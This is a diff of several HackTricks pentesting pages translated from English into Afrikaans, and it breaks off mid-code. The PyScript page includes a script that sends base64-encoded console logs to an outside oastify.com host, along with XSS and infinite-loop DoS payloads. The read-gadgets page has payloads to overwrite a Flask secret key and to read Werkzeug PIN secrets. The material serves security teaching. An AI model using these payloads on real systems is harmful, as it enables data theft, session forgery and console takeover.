* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

98
generic-methodologies-and-resources/python/pyscript.md
View file

@ -2,79 +2,72 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>
## PyScript Pentesting Guide
## PyScript Pentesting Gids
PyScript is a new framework developed for integrating Python into HTML so, it can be used alongside HTML. In this cheat sheet, you'll find how to use PyScript for your penetration testing purposes.
PyScript is 'n nuwe raamwerk wat ontwikkel is om Python in HTML te integreer, sodat dit saam met HTML gebruik kan word. In hierdie spiekbriefie sal jy vind hoe om PyScript te gebruik vir jou penetrasietoetsdoeleindes.
### Dumping / Retrieving files from the Emscripten virtual memory filesystem:
### Dumping / Ophaling van lêers uit die Emscripten virtuele geheuebestandstelsel:
`CVE ID: CVE-2022-30286`\
\
Code:
Kode:
```html
<py-script>
with open('/lib/python3.10/site-packages/_pyodide/_base.py', 'r') as fin:
out = fin.read()
print(out)
with open('/lib/python3.10/site-packages/_pyodide/_base.py', 'r') as fin:
out = fin.read()
print(out)
</py-script>
```
Result:
![](https://user-images.githubusercontent.com/66295316/166847974-978c4e23-05fa-402f-884a-38d91329bac3.png)
### [OOB Data Exfiltration of the Emscripten virtual memory filesystem (console monitoring)](https://github.com/s/jcd3T19P0M8QRnU1KRDk/\~/changes/Wn2j4r8jnHsV8mBiqPk5/blogs/the-art-of-vulnerability-chaining-pyscript)
### [OOB Data Exfiltration van die Emscripten virtuele geheue-lêersisteem (konsole monitering)](https://github.com/s/jcd3T19P0M8QRnU1KRDk/\~/changes/Wn2j4r8jnHsV8mBiqPk5/blogs/the-art-of-vulnerability-chaining-pyscript)
`CVE ID: CVE-2022-30286`\
\
Code:
Kode:
```html
<py-script>
<py-script>
x = "CyberGuy"
if x == "CyberGuy":
with open('/lib/python3.10/asyncio/tasks.py') as output:
contents = output.read()
print(contents)
with open('/lib/python3.10/asyncio/tasks.py') as output:
contents = output.read()
print(contents)
print('<script>console.pylog = console.log; console.logs = []; console.log = function(){ console.logs.push(Array.from(arguments)); console.pylog.apply(console, arguments);fetch("http://9hrr8wowgvdxvlel2gtmqbspigo8cx.oastify.com/", {method: "POST",headers: {"Content-Type": "text/plain;charset=utf-8"},body: JSON.stringify({"content": btoa(console.logs)})});}</script>')
</py-script>
</py-script>
```
Result:
![](https://user-images.githubusercontent.com/66295316/166848198-49f71ccb-73cf-476b-b8f3-139e6371c432.png)
### Cross Site Scripting (Ordinary)
Code:
### Kruiswebkrips (Gewoonlik)
Kode:
```python
<py-script>
print("<img src=x onerror='alert(document.domain)'>")
print("<img src=x onerror='alert(document.domain)'>")
</py-script>
```
Result:
![](https://user-images.githubusercontent.com/66295316/166848393-e835cf6b-992e-4429-ad66-bc54b98de5cf.png)
### Cross Site Scripting (Python Obfuscated)
Code:
### Kruiswebkripsing (Python Versteur)
Kode:
```python
<py-script>
sur = "\u0027al";fur = "e";rt = "rt"
@ -86,50 +79,45 @@ y = "o";m = "ner";z = "ror\u003d"
print(pic+pa+" "+so+e+q+" "+y+m+z+sur+fur+rt+s+p)
</py-script>
```
Result:
![](https://user-images.githubusercontent.com/66295316/166848370-d981c94a-ee05-42a8-afb8-ccc4fc9f97a0.png)
### Cross Site Scripting (JavaScript Obfuscation)
Code:
### Kruiswebkrips (JavaScript-verduistering)
Kode:
```html
<py-script>
prinht("<script>var _0x3675bf=_0x5cf5;function _0x5cf5(_0xced4e9,_0x1ae724){var _0x599cad=_0x599c();return _0x5cf5=function(_0x5cf5d2,_0x6f919d){_0x5cf5d2=_0x5cf5d2-0x94;var _0x14caa7=_0x599cad[_0x5cf5d2];return _0x14caa7;},_0x5cf5(_0xced4e9,_0x1ae724);}(function(_0x5ad362,_0x98a567){var _0x459bc5=_0x5cf5,_0x454121=_0x5ad362();while(!![]){try{var _0x168170=-parseInt(_0x459bc5(0x9e))/0x1*(parseInt(_0x459bc5(0x95))/0x2)+parseInt(_0x459bc5(0x97))/0x3*(-parseInt(_0x459bc5(0x9c))/0x4)+-parseInt(_0x459bc5(0x99))/0x5+-parseInt(_0x459bc5(0x9f))/0x6*(parseInt(_0x459bc5(0x9d))/0x7)+-parseInt(_0x459bc5(0x9b))/0x8*(-parseInt(_0x459bc5(0x9a))/0x9)+-parseInt(_0x459bc5(0x94))/0xa+parseInt(_0x459bc5(0x98))/0xb*(parseInt(_0x459bc5(0x96))/0xc);if(_0x168170===_0x98a567)break;else _0x454121['push'](_0x454121['shift']());}catch(_0x5baa73){_0x454121['push'](_0x454121['shift']());}}}(_0x599c,0x28895),prompt(document[_0x3675bf(0xa0)]));function _0x599c(){var _0x34a15f=['15170376Sgmhnu','589203pPKatg','11BaafMZ','445905MAsUXq','432bhVZQo','14792bfmdlY','4FKyEje','92890jvCozd','36031bizdfX','114QrRNWp','domain','3249220MUVofX','18cpppdr'];_0x599c=function(){return _0x34a15f;};return _0x599c();}</script>")
</py-script>
prinht("<script>var _0x3675bf=_0x5cf5;function _0x5cf5(_0xced4e9,_0x1ae724){var _0x599cad=_0x599c();return _0x5cf5=function(_0x5cf5d2,_0x6f919d){_0x5cf5d2=_0x5cf5d2-0x94;var _0x14caa7=_0x599cad[_0x5cf5d2];return _0x14caa7;},_0x5cf5(_0xced4e9,_0x1ae724);}(function(_0x5ad362,_0x98a567){var _0x459bc5=_0x5cf5,_0x454121=_0x5ad362();while(!![]){try{var _0x168170=-parseInt(_0x459bc5(0x9e))/0x1*(parseInt(_0x459bc5(0x95))/0x2)+parseInt(_0x459bc5(0x97))/0x3*(-parseInt(_0x459bc5(0x9c))/0x4)+-parseInt(_0x459bc5(0x99))/0x5+-parseInt(_0x459bc5(0x9f))/0x6*(parseInt(_0x459bc5(0x9d))/0x7)+-parseInt(_0x459bc5(0x9b))/0x8*(-parseInt(_0x459bc5(0x9a))/0x9)+-parseInt(_0x459bc5(0x94))/0xa+parseInt(_0x459bc5(0x98))/0xb*(parseInt(_0x459bc5(0x96))/0xc);if(_0x168170===_0x98a567)break;else _0x454121['push'](_0x454121['shift']());}catch(_0x5baa73){_0x454121['push'](_0x454121['shift']());}}}(_0x599c,0x28895),prompt(document[_0x3675bf(0xa0)]));function _0x599c(){var _0x34a15f=['15170376Sgmhnu','589203pPKatg','11BaafMZ','445905MAsUXq','432bhVZQo','14792bfmdlY','4FKyEje','92890jvCozd','36031bizdfX','114QrRNWp','domain','3249220MUVofX','18cpppdr'];_0x599c=function(){return _0x34a15f;};return _0x599c();}</script>")
</py-script>
```
Result:
![](https://user-images.githubusercontent.com/66295316/166848442-2aece7aa-47b5-4ee7-8d1d-0bf981ba57b8.png)
### DoS attack (Infinity loop)
Code:
### DoS-aanval (Oneindige lus)
Kode:
```html
<py-script>
while True:
print("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;")
</py-script>
<py-script>
while True:
print("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;")
</py-script>
```
Result:
![](https://user-images.githubusercontent.com/66295316/166848534-3e76b233-a95d-4cab-bb2c-42dbd764fefa.png)
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
</details>

58
generic-methodologies-and-resources/python/python-internal-read-gadgets.md
View file

@ -1,37 +1,35 @@
# Python Internal Read Gadgets
# Python Interne Lees Gadgets
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
## Basic Information
## Basiese Inligting
Different vulnerabilities such as [**Python Format Strings**](bypass-python-sandboxes/#python-format-string) or [**Class Pollution**](class-pollution-pythons-prototype-pollution.md) might allow you to **read python internal data but won't allow you to execute code**. Therefore, a pentester will need to make the most of these read permissions to **obtain sensitive privileges and escalate the vulnerability**.
Verskillende kwesbaarhede soos [**Python-formaatreekse**](bypass-python-sandboxes/#python-format-string) of [**Klasverontreiniging**](class-pollution-pythons-prototype-pollution.md) mag jou in staat stel om **Python interne data te lees, maar sal nie toelaat dat jy kode uitvoer nie**. Daarom sal 'n pentester die meeste uit hierdie leesregte moet maak om **gevoelige bevoegdhede te verkry en die kwesbaarheid te eskaleer**.
### Flask - Read secret key
The main page of a Flask application will probably have the **`app`** global object where this **secret is configured**.
### Flask - Lees geheime sleutel
Die hoofbladsy van 'n Flask-toepassing sal waarskynlik die **`app`** globale objek hê waarin hierdie **geheime sleutel gekonfigureer** is.
```python
app = Flask(__name__, template_folder='templates')
app.secret_key = '(:secret:)'
```
In hierdie geval is dit moontlik om toegang tot hierdie objek te verkry deur enige gadget te gebruik om **globale objekte te benader** vanaf die [**Bypass Python sandboxes page**](bypass-python-sandboxes/).
In this case it's possible to access this object just using any gadget to **access global objects** from the [**Bypass Python sandboxes page**](bypass-python-sandboxes/).
In die geval waar **die kwesbaarheid in 'n ander Python-lêer is**, het jy 'n gadget nodig om deur lêers te blaai om by die hooflêer te kom om die globale objek `app.secret_key` te **benader** om die Flask-geheime sleutel te verander en in staat te wees om [**voorregte te verhoog** deur hierdie sleutel te ken](../../network-services-pentesting/pentesting-web/flask.md#flask-unsign).
In the case where **the vulnerability is in a different python file**, you need a gadget to traverse files to get to the main one to **access the global object `app.secret_key`** to change the Flask secret key and be able to [**escalate privileges** knowing this key](../../network-services-pentesting/pentesting-web/flask.md#flask-unsign).
A payload like this one [from this writeup](https://ctftime.org/writeup/36082):
'n Payload soos hierdie een [vanaf hierdie writeup](https://ctftime.org/writeup/36082):
{% code overflow="wrap" %}
```python
@ -39,33 +37,31 @@ __init__.__globals__.__loader__.__init__.__globals__.sys.modules.__main__.app.se
```
{% endcode %}
Use this payload to **change `app.secret_key`** (the name in your app might be different) to be able to sign new and more privileges flask cookies.
Gebruik hierdie payload om die `app.secret_key` (die naam in jou app mag verskil) te **verander** sodat jy nuwe en meer bevoegdhede flask koekies kan onderteken.
### Werkzeug - machine\_id and node uuid
[**Using these payload from this writeup**](https://vozec.fr/writeups/tweedle-dum-dee/) you will be able to access the **machine\_id** and the **uuid** node, which are the **main secrets** you need to [**generate the Werkzeug pin**](../../network-services-pentesting/pentesting-web/werkzeug.md) you can use to access the python console in `/console` if the **debug mode is enabled:**
### Werkzeug - machine\_id en node uuid
[**Deur hierdie payload van hierdie writeup**](https://vozec.fr/writeups/tweedle-dum-dee/) te gebruik, sal jy toegang hê tot die **machine\_id** en die **uuid** node, wat die **hoofgeheime** is wat jy nodig het om die [**Werkzeug pin te genereer**](../../network-services-pentesting/pentesting-web/werkzeug.md) wat jy kan gebruik om toegang te verkry tot die python-konsole in `/console` as die **foutopsporingsmodus geaktiveer is:**
```python
{ua.__class__.__init__.__globals__[t].sys.modules[werkzeug.debug]._machine_id}
{ua.__class__.__init__.__globals__[t].sys.modules[werkzeug.debug].uuid._node}
```
{% hint style="warning" %}
Note that you can get the **servers local path to the `app.py`** generating some **error** in the web page which will **give you the path**.
Let daarop dat jy die **bedieners se plaaslike pad na die `app.py`** kan kry deur 'n **fout** op die webblad te genereer wat jou die pad sal gee.
{% endhint %}
If the vulnerability is in a different python file, check the previous Flask trick to access the objects from the main python file.
As die kwesbaarheid in 'n ander Python-lêer is, kyk na die vorige Flask-truuk om toegang tot die voorwerpe van die hoof-Python-lêer te verkry.
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>

39
generic-methodologies-and-resources/python/venv.md
View file

@ -2,26 +2,25 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik **werkstrome** te bou en outomatiseer met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
Kry vandag toegang:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
```bash
sudo apt-get install python3-venv
#Now, go to the folder you want to create the virtual environment
@ -40,25 +39,23 @@ is fixed running
pip3 install wheel
inside the virtual environment
```
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomaties werkstrome te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\
Kry Vandag Toegang:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>

123
generic-methodologies-and-resources/python/web-requests.md
View file

@ -1,29 +1,28 @@
# Web Requests
# Web Versoeke
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en **outomatiese werksvloeie** te bou met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
Kry Vandag Toegang:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## Python Requests
## Python Versoeke
```python
import requests
@ -67,78 +66,102 @@ proxies = {}
s = requests.Session()
def register(username, password):
resp = s.post(target + "/register", data={"username":username, "password":password, "submit": "Register"}, proxies=proxies, verify=0)
return resp
resp = s.post(target + "/register", data={"username":username, "password":password, "submit": "Register"}, proxies=proxies, verify=0)
return resp
def login(username, password):
